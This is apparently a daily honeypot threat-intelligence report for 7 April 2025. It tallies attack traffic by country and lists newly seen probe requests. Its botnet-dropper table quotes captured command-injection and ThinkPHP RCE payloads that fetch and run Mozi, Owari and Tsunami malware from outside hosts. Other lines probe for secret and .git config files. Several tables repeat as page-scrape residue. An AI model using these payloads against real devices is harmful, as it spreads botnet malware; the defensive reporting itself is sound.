Table of Contents

Daily Report: 2025-04-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 155 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3066 requests were recorded during the day, originating from 12 different countries, with a peak of 679 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
SC	Germany
DE	Germany
US	Germany
US	Germany
US	Germany
US	Germany
AU
US	Dubai
CN	Georgia
GB	Georgia

botnet_dropper_behaviour
#

remote_addr	request
31.170.22.205	GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
139.5.1.166	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.1.166:50235/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
43.230.156.14	GET /shell?cd+/tmp;rm+-rf+*;wget+http://43.230.156.14:48972/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
58.146.59.84	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
58.58.30.134	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
217.160.89.196	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
110.175.39.203	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
83.63.8.151	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
84.195.192.75	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
90.214.52.113	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
51.190.15.243	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
82.38.194.39	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
75	5	GET /config/initializers/oauth.rb HTTP/1.1
76	5	GET /config.xml HTTP/1.1
77	5	GET /config/app_config.yaml HTTP/1.1
78	5	GET /config/google.json HTTP/1.1
79	5	GET /config/development.json HTTP/1.1
80	5	GET /secrets/oauth.json HTTP/1.1
81	5	GET /secrets/auth.yaml HTTP/1.1
82	5	GET /config/production.json HTTP/1.1
85	5	GET /secrets.py HTTP/1.1
86	5	GET /auth/keys.ini HTTP/1.1
87	5	GET /microservices/oauth/config.json HTTP/1.1
91	5	GET /etc/oauth/config.json HTTP/1.1
92	5	GET /config/staging.yaml HTTP/1.1
93	5	GET /config/okta_oauth.yaml HTTP/1.1
94	5	GET /app/secrets/oauth.yaml HTTP/1.1
95	5	GET /secrets/token_store.yaml HTTP/1.1
96	5	GET /config/github.yaml HTTP/1.1
97	5	GET /src/main/resources/application.yml HTTP/1.1
98	5	GET /config/server_auth.yaml HTTP/1.1
99	5	GET /src/config/api_keys.json HTTP/1.1
100	5	GET /etc/auth/secrets.yaml HTTP/1.1
101	5	GET /settings/service_keys.ini HTTP/1.1
102	5	GET /security/keys.json HTTP/1.1
103	5	GET /auth/settings.yaml HTTP/1.1
104	5	GET /vault/config.json HTTP/1.1
105	5	GET /auth/config.json HTTP/1.1
106	5	GET /cloud/settings.yaml HTTP/1.1
107	5	GET /config/integration.json HTTP/1.1
108	5	GET /config/credentials.yml HTTP/1.1
109	5	GET /secrets/secrets.json HTTP/1.1
110	5	GET /vault/oauth.yaml HTTP/1.1
112	5	GET /etc/app/config.ini HTTP/1.1
113	5	GET /config/client_oauth.json HTTP/1.1
114	5	GET /conf.d/oauth.conf HTTP/1.1
115	5	GET /config/auth_override.json HTTP/1.1
116	5	GET /config/aws.json HTTP/1.1
117	5	GET /config/twitter_auth.yaml HTTP/1.1
118	5	GET /environments/dev/config.yaml HTTP/1.1
119	5	GET /secrets/integration_auth.yaml HTTP/1.1
120	5	GET /config/oauth.json HTTP/1.1
121	5	GET /auth.json HTTP/1.1
122	5	GET /security/oauth.json HTTP/1.1
123	5	GET /config/external_auth.json HTTP/1.1
125	5	GET /scripts/auth_settings.yaml HTTP/1.1
126	5	GET /services/auth/config.json HTTP/1.1
127	5	GET /services/api/auth.yaml HTTP/1.1
128	5	GET /application.yml HTTP/1.1
130	5	GET /config/gcp_oauth.json HTTP/1.1
131	5	GET /auth/provider_config.yaml HTTP/1.1
132	5	GET /test/settings.yaml HTTP/1.1
133	5	GET /spec/config/oauth.yaml HTTP/1.1
134	5	GET /scripts/secrets.yaml HTTP/1.1
135	5	GET /usr/src/app/auth.json HTTP/1.1
136	5	GET /settings/base.ini HTTP/1.1
137	5	GET /src/config/settings.yaml HTTP/1.1
138	5	GET /app/settings/auth.json HTTP/1.1
139	5	GET /config/api.json HTTP/1.1
140	5	GET /config/database.yml HTTP/1.1
141	5	GET /config/microsoft.json HTTP/1.1
142	5	GET /project/settings.py HTTP/1.1
143	5	GET /config/dev_config.ini HTTP/1.1
144	5	GET /config/base.json HTTP/1.1
145	5	GET /config/auth.yaml HTTP/1.1
146	5	GET /config/security.ini HTTP/1.1
147	5	GET /scripts/config.json HTTP/1.1
148	5	GET /config/db.json HTTP/1.1
150	5	GET /tests/auth_config.ini HTTP/1.1
151	5	GET /config/facebook_oauth.json HTTP/1.1
152	5	GET /services/user/settings.yaml HTTP/1.1
153	5	GET /environments/prod/settings.json HTTP/1.1
154	5	GET /security/auth_settings.yaml HTTP/1.1
155	5	GET /db/settings.ini HTTP/1.1
156	5	GET /config/service_auth.json HTTP/1.1
158	5	GET /automation/oauth.json HTTP/1.1
160	5	GET /db/auth_config.json HTTP/1.1
161	5	GET /app/config/oauth.json HTTP/1.1
162	5	GET /security/api_settings.json HTTP/1.1
163	5	GET /src/auth/config.yaml HTTP/1.1
164	5	GET /tests/config/test_oauth.json HTTP/1.1
165	5	GET /app/auth/config.json HTTP/1.1
166	5	GET /settings/api_config.json HTTP/1.1
167	5	GET /config/azure_auth.yaml HTTP/1.1
168	5	GET /config/keys.yaml HTTP/1.1
170	5	GET /auth/oauth_config.ini HTTP/1.1
171	5	GET /config/local.yaml HTTP/1.1
411	2	GET /cgi-bin/welcome HTTP/1.1
412	2	GET /logon/LogonPoint/tmindex.html HTTP/1.1
422	2	GET /vpn/index.html HTTP/1.1
481	1	GET /odinhttpcall1744057397 HTTP/1.1
482	1	GET /OdinHttpCall1744057397 HTTP/1.1
483	1	GET /Odin/http/call1744057397 HTTP/1.1
484	1	GET /HNAP1 HTTP/1.1
496	1	GET /internal/.git/config HTTP/1.1
497	1	\x03\x00\x00&!\xE0\x00\x00\xFE\xCA\x00Cookie: mstshash=
498	1	\x00\x9C\x00\x01\x1A+<M\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\xFF\xFF\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
569	1	GET /zwso.php HTTP/1.1
581	1	GET /NmapUpperCheck1744031320 HTTP/1.1
589	1	GET /nVNJ HTTP/1.1
591	1	GET /nmaplowercheck1744031320 HTTP/1.1
610	1	GET /Nmap/folder/check1744031320 HTTP/1.1
809	1	GET /env.save HTTP/1.1
810	1	GET /sites/.env HTTP/1.1
815	1	GET /gists/cache HTTP/1.1
834	1	GET /platform/.env/conf/.env HTTP/1.1
852	1	\x00\x00\x00’\xFFSMBr\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x00\x02NT LM 0.12\x00
864	1	\x00\x00\x00\x1D\xD0\xF2\x81\xF8\x8B\xFF\x9A\xF7\xD5\xEF\x94\xB6\xD1\xB4\xC0\x9F\xEC\x95\xE6\x8F\xE1\x87\xE8\xCA\xF0\x8B\xF6\x8B\xF6
865	1	c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00OISYSNEC\x00\x00\x00\x00
869	1	GET /Nmap/folder/check1744061948 HTTP/1.1
870	1	GET /NmapUpperCheck1744061948 HTTP/1.1
871	1	GET /nmaplowercheck1744061948 HTTP/1.1
884	1	GET /backend/.git/config HTTP/1.1
885	1	GET /api/v2/.git/config HTTP/1.1
886	1	GET /js../.git/config HTTP/1.1
887	1	GET /includes/.git/config HTTP/1.1
888	1	GET /html/.git/config HTTP/1.1
889	1	GET /download/.git/config HTTP/1.1
892	1	GET /api/v1/.git/config HTTP/1.1
893	1	GET /administrator/.git/config HTTP/1.1
894	1	GET /admin-panel/.git/config HTTP/1.1
895	1	GET /accounts/.git/config HTTP/1.1
896	1	GET /drupal/themes/.git/config HTTP/1.1
897	1	GET /docs/.git/config HTTP/1.1
898	1	GET /img../.git/config HTTP/1.1
899	1	GET /content../.git/config HTTP/1.1
900	1	GET /frontend/.git/config HTTP/1.1
901	1	GET /bin/.git/config HTTP/1.1
902	1	GET /about/.git/config HTTP/1.1
903	1	GET /vendor/drupal/coder/.git/config HTTP/1.1
904	1	GET /lib../.git/config HTTP/1.1
905	1	GET /home/.git/config HTTP/1.1
906	1	GET /help/.git/config HTTP/1.1
907	1	GET /forum/.git/config HTTP/1.1
909	1	GET /events../.git/config HTTP/1.1
910	1	GET /etc/.git/config HTTP/1.1
911	1	GET /css/.git/config HTTP/1.1
912	1	GET /auth/.git/config HTTP/1.1
913	1	GET /assets/.git/config HTTP/1.1
914	1	GET /drupal/.git/config HTTP/1.1
915	1	GET /customer/.git/config HTTP/1.1
916	1	\x00m\x00\x00\x01\x00\x00\x00\x018\x01,\x0CA \x00\xFF\xFF\x7F\x08\x00\x00\x01\x00\x003\x00:\x00\x00\x08\x00AA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=lzrORA))))
917	1	\x12\x01\x00/\x00\x00\x02\x00\x00\x00\x1A\x00\x06\x01\x00\x02\x00\x01\x02\x00!\x00\x01\x03\x00\x22\x00\x04\x04\x00&\x00\x01\xFF\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00
918	1	\x10\x0F\x00\x04MQTT\x04\x00\x00
922	1	GET /drupal/modules/.git/config HTTP/1.1
923	1	GET /console/.git/config HTTP/1.1
924	1	GET /cloud/.git/config HTTP/1.1
925	1	GET /cgi-bin/.git/config HTTP/1.1
926	1	GET /images../.git/config HTTP/1.1
927	1	GET /img/.git/config HTTP/1.1
928	1	GET /core/app/.git/config HTTP/1.1
929	1	GET /components/.git/config HTTP/1.1
930	1	GET /cache/.git/config HTTP/1.1
931	1	GET /css../.git/config HTTP/1.1
946	1	POST /onvif/device_service HTTP/1.1
947	1	GET /PSIA/index HTTP/1.1
955	1	\x14\x00\x00\x0Exxx.xxx.xxx.xxx\x00P\x01\x01\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	679	NL
1	528	GB
2	254	SC
3	252	US
4	215	CN
5	210	AU
6	169	HK
7	168	PL
8	161	BG
9	81	DE
10	50	ID
11	37	RU
12	31	CA
13	26	JP
14	23	UA
15	20	LV
16	19	FR
17	18	CH
18	16	IL
19	16	KR
20	14	NG
21	10	GH
22	10	IT
23	8	BR
24	8	LT
25	6	BE
26	5	TH
27	4	IN
28	3	TW
29	3	SG
30	2	AR
31	2	MX
32	2	HR
33	2	FI
34	1	ZA
35	1	PA
36	1	SA
37	1	MK
38	1	MD
39	1	AZ
40	1	PT
41	1	GR
42	1	EE
43	1	KH
44	1	AO
45	1	TR
46	1	ES
47	1	RS

Report: 2025-04-06

6 April 2025·510 words

Repport Daily

Report: 2025-04-05

5 April 2025·622 words

Repport Daily

Report: 2025-04-04

4 April 2025·1256 words

Repport Daily

	number_of_occurence	country_iso_code
0	679	NL
1	528	GB
2	254	SC
3	252	US
4	215	CN
5	210	AU
6	169	HK
7	168	PL
8	161	BG
9	81	DE
10	50	ID
11	37	RU
12	31	CA
13	26	JP
14	23	UA
15	20	LV
16	19	FR
17	18	CH
18	16	IL
19	16	KR
20	14	NG
21	10	GH
22	10	IT
23	8	BR
24	8	LT
25	6	BE
26	5	TH
27	4	IN
28	3	TW
29	3	SG
30	2	AR
31	2	MX
32	2	HR
33	2	FI
34	1	ZA
35	1	PA
36	1	SA
37	1	MK
38	1	MD
39	1	AZ
40	1	PT
41	1	GR
42	1	EE
43	1	KH
44	1	AO
45	1	TR
46	1	ES
47	1	RS

	number_of_occurence	country_iso_code
0	679	NL
1	528	GB
2	254	SC
3	252	US
4	215	CN
5	210	AU
6	169	HK
7	168	PL
8	161	BG
9	81	DE
10	50	ID
11	37	RU
12	31	CA
13	26	JP
14	23	UA
15	20	LV
16	19	FR
17	18	CH
18	16	IL
19	16	KR
20	14	NG
21	10	GH
22	10	IT
23	8	BR
24	8	LT
25	6	BE
26	5	TH
27	4	IN
28	3	TW
29	3	SG
30	2	AR
31	2	MX
32	2	HR
33	2	FI
34	1	ZA
35	1	PA
36	1	SA
37	1	MK
38	1	MD
39	1	AZ
40	1	PT
41	1	GR
42	1	EE
43	1	KH
44	1	AO
45	1	TR
46	1	ES
47	1	RS

Daily Report: 2025-04-07#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-04-07
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	679	NL
1	528	GB
2	254	SC
3	252	US
4	215	CN
5	210	AU
6	169	HK
7	168	PL
8	161	BG
9	81	DE
10	50	ID
11	37	RU
12	31	CA
13	26	JP
14	23	UA
15	20	LV
16	19	FR
17	18	CH
18	16	IL
19	16	KR
20	14	NG
21	10	GH
22	10	IT
23	8	BR
24	8	LT
25	6	BE
26	5	TH
27	4	IN
28	3	TW
29	3	SG
30	2	AR
31	2	MX
32	2	HR
33	2	FI
34	1	ZA
35	1	PA
36	1	SA
37	1	MK
38	1	MD
39	1	AZ
40	1	PT
41	1	GR
42	1	EE
43	1	KH
44	1	AO
45	1	TR
46	1	ES
47	1	RS